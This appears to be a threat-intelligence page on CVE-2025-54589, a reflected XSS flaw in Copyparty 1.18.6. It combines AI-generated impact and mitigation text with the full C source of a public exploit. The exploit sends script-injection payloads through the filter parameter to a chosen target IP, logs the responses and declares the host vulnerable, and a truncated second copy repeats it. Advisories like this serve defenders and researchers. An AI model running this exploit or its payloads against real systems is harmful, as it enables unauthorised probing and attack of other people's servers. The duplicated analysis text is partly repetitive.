Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
AI Analysis
Technical Summary
The security threat concerns a reflected Cross-Site Scripting (XSS) vulnerability in Copyparty version 1.18.6. Copyparty is a web-based file sharing and hosting application. Reflected XSS vulnerabilities occur when untrusted user input is immediately returned by a web application in an HTTP response without proper sanitization or encoding, allowing an attacker to inject malicious scripts that execute in the context of the victim's browser. In this case, the vulnerability enables an attacker to craft a specially crafted URL or request that, when visited by a victim, causes the victim's browser to execute attacker-controlled JavaScript code. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The exploit code is publicly available and written in the C programming language, indicating that the vulnerability can be reliably triggered and potentially automated. Although no specific affected versions are listed beyond 1.18.6, the presence of exploit code and the medium severity rating suggest that the vulnerability is exploitable without complex prerequisites. No patch links are provided, implying that either no official fix is available yet or it has not been referenced in this report. The vulnerability does not require authentication but does require user interaction, as the victim must visit a maliciously crafted URL or page. The absence of known exploits in the wild suggests limited active exploitation at this time, but the availability of exploit code increases the risk of future attacks.
Potential Impact
For European organizations using Copyparty 1.18.6 or similar vulnerable versions, this reflected XSS vulnerability poses a risk to the confidentiality and integrity of user sessions and data. Attackers could steal session cookies, impersonate users, or perform unauthorized actions within the context of the victim's session. This is particularly concerning for organizations that use Copyparty to share sensitive or proprietary files internally or externally. The vulnerability could be leveraged in targeted phishing campaigns to trick employees into clicking malicious links, potentially leading to broader network compromise or data leakage. Additionally, reputational damage could result if attackers deface hosted content or use the platform to distribute malware. Since Copyparty is a web application, the availability impact is minimal, but the confidentiality and integrity impacts are significant enough to warrant prompt mitigation. The threat is amplified in environments where Copyparty is exposed to the internet or accessible by a large user base without strict access controls.
Mitigation Recommendations
European organizations should immediately review their deployment of Copyparty and identify any instances running version 1.18.6 or other potentially vulnerable versions. As no official patch links are provided, organizations should consider the following specific mitigations: 1) Implement strict input validation and output encoding on all user-supplied data to prevent script injection. 2) Employ Web Application Firewalls (WAFs) with rules designed to detect and block reflected XSS attack patterns targeting Copyparty endpoints. 3) Restrict access to Copyparty instances to trusted internal networks or VPNs to reduce exposure. 4) Educate users about the risks of clicking on suspicious links and encourage the use of updated browsers with built-in XSS protections. 5) Monitor web server logs for unusual request patterns indicative of XSS exploitation attempts. 6) If possible, upgrade to a newer, patched version of Copyparty once available or apply community-supplied patches. 7) Use Content Security Policy (CSP) headers to limit the execution of unauthorized scripts in the browser context. These targeted measures go beyond generic advice by focusing on the specific nature of the reflected XSS in Copyparty and the operational context of European organizations.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Denmark
Indicators of Compromise
- exploit-code: /* * Author : Byte Reaper * CVE : CVE-2025-54589 * Title : Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS) * CVE-2025-54589 is a reflected cross-site scripting (XSS) vulnerability in Copyparty (≤ 1.18.6) where the filter parameter is inserted into the HTML response without proper sanitization, allowing an attacker to inject and execute arbitrary JavaScript in a victim’s browser */ #include <curl/urlapi.h> #include <netinet/in.h> #include <stdio.h> #include <string.h> #include <curl/curl.h> #include "argparse.h" #include <stdlib.h> #include <arpa/inet.h> #include <stdarg.h> #include <unistd.h> #define FULL_URL 2500 #define COLOR_RESET "\e[0m" #define COLOR_RED "\e[1;31m" #define COLOR_GRN "\e[1;32m" #define COLOR_YEL "\e[1;33m" #define COLOR_BLU "\e[1;34m" #define COLOR_CYN "\e[1;36m" #define COLOR_WHT "\e[1;37m" #define COLOR_PUR "\e[1;35m" #define PRINT_OK(fmt, ...) print_color(COLOR_GRN, "" fmt, ##__VA_ARGS__) #define PRINT_ERR(fmt, ...) print_color(COLOR_RED, "" fmt, ##__VA_ARGS__) #define PRINT_WARN(fmt, ...) print_color(COLOR_YEL, "" fmt, ##__VA_ARGS__) #define PRINT_INFO(fmt, ...) print_color(COLOR_BLU, "" fmt, ##__VA_ARGS__) #define PRINT_NOTE(fmt, ...) print_color(COLOR_CYN, "" fmt, ##__VA_ARGS__) int verbose = 0; int useC = 0; const char *ipT = NULL; int portT = 0; const char *cookies = NULL; const char *caFile = NULL; int sCa = 0; int useColor = 1; int useHttp = 0; void print_color(const char *color, const char *fmt, ...) { va_list args; va_start(args, fmt); if (useColor) { printf("%s", color); } vprintf(fmt, args); if (useColor) { printf("%s", COLOR_RESET); } va_end(args); } void exitAssembly() { __asm__ volatile ( "xor %%rdi, %%rdi\n\t" "mov $231, %%rax\n\t" "syscall\n\t" : : : "rax", "rdi" ); } struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { PRINT_ERR("[-] Failed to allocate memory!\n"); exitAssembly(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } const char *payloadXss[] = { "</script><script>alert(1)</script>", "<script\x09type=\"text/javascript\">javascript:alert(XSS);</script>", "<script\x0Ctype=\"text/javascript\">javascript:alert(byte);</script>" }; int number = sizeof(payloadXss) / sizeof(payloadXss[0]); const char *wordF[] = { "Error", "Exception", "Invalid", "XSS", "<script>", "</script>", "alert(1)", "syntax", "unexpected", "undefined", "NaN", "stack trace", "TypeError", "ReferenceError", "Warning", "Access denied", "eval(", "byte", }; int numberW = sizeof(wordF) / sizeof(wordF[0]); void auto_detect_color() { if (!isatty(fileno(stdout))) { useColor = 0; } } void senR(const char *ip, int port) { char full[FULL_URL]; CURLcode res ; CURL *curl = curl_easy_init(); struct Mem response ; response.buffer= NULL; response.len = 0; for (int h = 0; h < number ; h++) { if (!curl) { PRINT_ERR("[-] Error Create Object Curl !\n"); PRINT_ERR("[-] Check Your Connection\n"); exitAssembly(); } if (verbose) { PRINT_OK("==========================================\n"); PRINT_OK("[1;33m[+] Cleaning Response...\n"); PRINT_OK("[1;33m[+] Response Buffer : NULL\n"); PRINT_OK("[1;33m[+] Response Len : 0\n"); PRINT_OK("==========================================\n"); } if (curl) { char *payloadE = curl_easy_escape(curl, payloadXss[h], 0); struct curl_slist *headers = NULL; if (!payloadE) { PRINT_ERR("[-] Error Encode Payload !\e[0m\n"); curl_slist_free_all(headers); curl_easy_cleanup(curl); exitAssembly(); } const char *proto = useHttp ? "http" : "https"; int len1 = snprintf(full, sizeof(full), "%s://%s:%d/?filter=%s", proto, ip, port, payloadE); if (len1 >= sizeof(full)) { PRINT_ERR("[-] URL too long\n"); exitAssembly(); } PRINT_INFO("[+] Encode Payload : %s\n", payloadXss[h]); PRINT_INFO("[+] Encode Payload Successfully.\n"); PRINT_INFO("[+] Payload Encode : %s\n", payloadE); PRINT_INFO("[+] target IP : %s\n", ip); printf("[+] Full Url : %s\n", full); printf("[+] Port : %d\n", port); curl_easy_setopt(curl, CURLOPT_URL, full); curl_free(payloadE); if (useC) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); usleep(1500000); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); if (sCa) { curl_easy_setopt(curl, CURLOPT_CAINFO, caFile); } else { curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); } headers = curl_slist_append(headers, "Accept-Language: en-US,en"); headers = curl_slist_append(headers, "Connection: keep-alive"); char refR[120]; int lenF = snprintf(refR, sizeof(refR), "Referer: http://%s:%d", ip, port); if (lenF < 0 || (size_t)lenF >= sizeof(refR)) { PRINT_ERR("[-] Len Header Referer is Long ! \n"); response.buffer = NULL; response.len = 0; curl_slist_free_all(headers); curl_easy_cleanup(curl); exitAssembly(); } headers = curl_slist_append(headers, refR); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); if (verbose) { PRINT_OK("------------------------------------------[Verbose Curl]------------------------------------------\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } res = curl_easy_perform(curl); curl_slist_free_all(headers); if (res == CURLE_OK) { PRINT_OK("-----------------------------------------------------------------\n"); long httpCode = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); PRINT_INFO("[+] Request sent successfully\e[0m\n"); PRINT_OK("[+] Http Code -> %ld\e[0m\n", httpCode); FILE *log = fopen("results.txt", "a"); if (log == NULL) { PRINT_ERR("[-] Error Create File !\n"); exitAssembly(); } if (log) { fprintf(log, "[+] Target: %s:%d | Payload: %s\n", ip, port, payloadXss[h]); fprintf(log, "[+] Response : \n%s\n", response.buffer); fclose(log); } if (httpCode >= 200 && httpCode < 300) { PRINT_OK("[+] Http Code (200 < 300) : %ld\n",httpCode); for (int s = 0; s < numberW ; s++) { if (strstr(response.buffer, wordF[s]) != NULL) { PRINT_INFO("[+] A suspicious word was found in the server's response !!\n"); PRINT_INFO("[+] Word Found : %s\n", wordF[s]); PRINT_NOTE("[+] The vulnerability CVE-2025-54589 exists on the server\n"); PRINT_OK("\n======================================== [Response Server] ========================================\n"); printf("%s\n", response.buffer); printf("[Len] : %zu\n", response.len); PRINT_OK("\n==================================================================================================\n"); } } } else { PRINT_ERR("[-] HTTP Code Not Range Positive (200 < 300) : %ld\n", httpCode); PRINT_ERR("[+] Try Next Payload : %s\e[0m\n", payloadXss[h]); } } else { PRINT_ERR("[-] Error Send Request\n"); PRINT_ERR("[-] Error : %s\e[0m\n", curl_easy_strerror(res)); exitAssembly(); } } } if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } curl_easy_cleanup(curl); } int main(int argc, const char **argv) { curl_global_init(CURL_GLOBAL_DEFAULT); printf( "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▖▖▄▖▄▖▄▖\n" "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▖▙▌▙▖▙▌▙▌\n" "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▄▌ ▌▄▌▙▌▄▌\n" "Byte Reaper\n" ); int noColor = 0; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('i', "ip", &ipT, "Target IP "), OPT_STRING('c', "cookies", &cookies, "cookies File"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_INTEGER('p', "port", &portT, "Enter Target Port"), OPT_STRING('a', "ca" , &caFile, "Enter Name File CA\n"), OPT_BOOLEAN('t', "http", &useHttp, "HTTP Protocol"), OPT_BOOLEAN('n', "no-color", &noColor, "Disable colored output"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (ipT == NULL) { PRINT_ERR("[-] Please Enter Target Ip And Port !\n"); PRINT_ERR("[-] Ex : ./exploit -i <IP> -p <PORT>\n"); PRINT_ERR("[-] Exit Syscall\n"); curl_global_cleanup(); exitAssembly(); }; printf("---------------------------------------------------------------------\n\n"); printf("[+] Start Exploit XSS (CVE-2025-54589)...\n"); if (cookies) { useC = 1; } if (verbose) { verbose = 1; } if (!portT) { printf("[+] Default Port : %d\n", 3923); portT = 3923; } if (caFile) { sCa = 1; } if (useColor) { useColor = 1; } if (noColor) { useColor = 0; } if (useHttp) { useHttp = 1; } auto_detect_color(); senR(ipT, portT); curl_global_cleanup(); return 0; }
Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
Description
Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
AI-Powered Analysis
Technical Analysis
The security threat concerns a reflected Cross-Site Scripting (XSS) vulnerability in Copyparty version 1.18.6. Copyparty is a web-based file sharing and hosting application. Reflected XSS vulnerabilities occur when untrusted user input is immediately returned by a web application in an HTTP response without proper sanitization or encoding, allowing an attacker to inject malicious scripts that execute in the context of the victim's browser. In this case, the vulnerability enables an attacker to craft a specially crafted URL or request that, when visited by a victim, causes the victim's browser to execute attacker-controlled JavaScript code. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The exploit code is publicly available and written in the C programming language, indicating that the vulnerability can be reliably triggered and potentially automated. Although no specific affected versions are listed beyond 1.18.6, the presence of exploit code and the medium severity rating suggest that the vulnerability is exploitable without complex prerequisites. No patch links are provided, implying that either no official fix is available yet or it has not been referenced in this report. The vulnerability does not require authentication but does require user interaction, as the victim must visit a maliciously crafted URL or page. The absence of known exploits in the wild suggests limited active exploitation at this time, but the availability of exploit code increases the risk of future attacks.
Potential Impact
For European organizations using Copyparty 1.18.6 or similar vulnerable versions, this reflected XSS vulnerability poses a risk to the confidentiality and integrity of user sessions and data. Attackers could steal session cookies, impersonate users, or perform unauthorized actions within the context of the victim's session. This is particularly concerning for organizations that use Copyparty to share sensitive or proprietary files internally or externally. The vulnerability could be leveraged in targeted phishing campaigns to trick employees into clicking malicious links, potentially leading to broader network compromise or data leakage. Additionally, reputational damage could result if attackers deface hosted content or use the platform to distribute malware. Since Copyparty is a web application, the availability impact is minimal, but the confidentiality and integrity impacts are significant enough to warrant prompt mitigation. The threat is amplified in environments where Copyparty is exposed to the internet or accessible by a large user base without strict access controls.
Mitigation Recommendations
European organizations should immediately review their deployment of Copyparty and identify any instances running version 1.18.6 or other potentially vulnerable versions. As no official patch links are provided, organizations should consider the following specific mitigations: 1) Implement strict input validation and output encoding on all user-supplied data to prevent script injection. 2) Employ Web Application Firewalls (WAFs) with rules designed to detect and block reflected XSS attack patterns targeting Copyparty endpoints. 3) Restrict access to Copyparty instances to trusted internal networks or VPNs to reduce exposure. 4) Educate users about the risks of clicking on suspicious links and encourage the use of updated browsers with built-in XSS protections. 5) Monitor web server logs for unusual request patterns indicative of XSS exploitation attempts. 6) If possible, upgrade to a newer, patched version of Copyparty once available or apply community-supplied patches. 7) Use Content Security Policy (CSP) headers to limit the execution of unauthorized scripts in the browser context. These targeted measures go beyond generic advice by focusing on the specific nature of the reflected XSS in Copyparty and the operational context of European organizations.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52390
- Has Exploit Code
- true
- Code Language
- c
Indicators of Compromise
Exploit Source Code
Exploit code for Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
/* * Author : Byte Reaper * CVE : CVE-2025-54589 * Title : Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS) * CVE-2025-54589 is a reflected cross-site scripting (XSS) vulnerability in Copyparty (≤ 1.18.6) where the filter parameter is inserted into the HTML response without proper sanitization, allowing an attacker to inject and execute arbitrary JavaScript in a victim’s browser */ #include <curl/urlapi.h> #include <netinet/in.h> #include <stdio.h> #include <string.h... (12479 more characters)
Threat ID: 68900844ad5a09ad00dd9e01
Added to database: 8/4/2025, 1:09:24 AM
Last enriched: 8/18/2025, 1:17:07 AM
Last updated: 8/19/2025, 1:53:49 AM
Views: 17
Related Threats
Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems
HighHow We Exploited CodeRabbit: From a Simple PR to RCE and Write Access on 1M Repositories
MediumTrivial C# Random Exploitation
HighU.S. CISA adds Trend Micro Apex One flaw to its Known Exploited Vulnerabilities catalog
MediumBigAnt Office Messenger 5.6.06 - SQL Injection
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.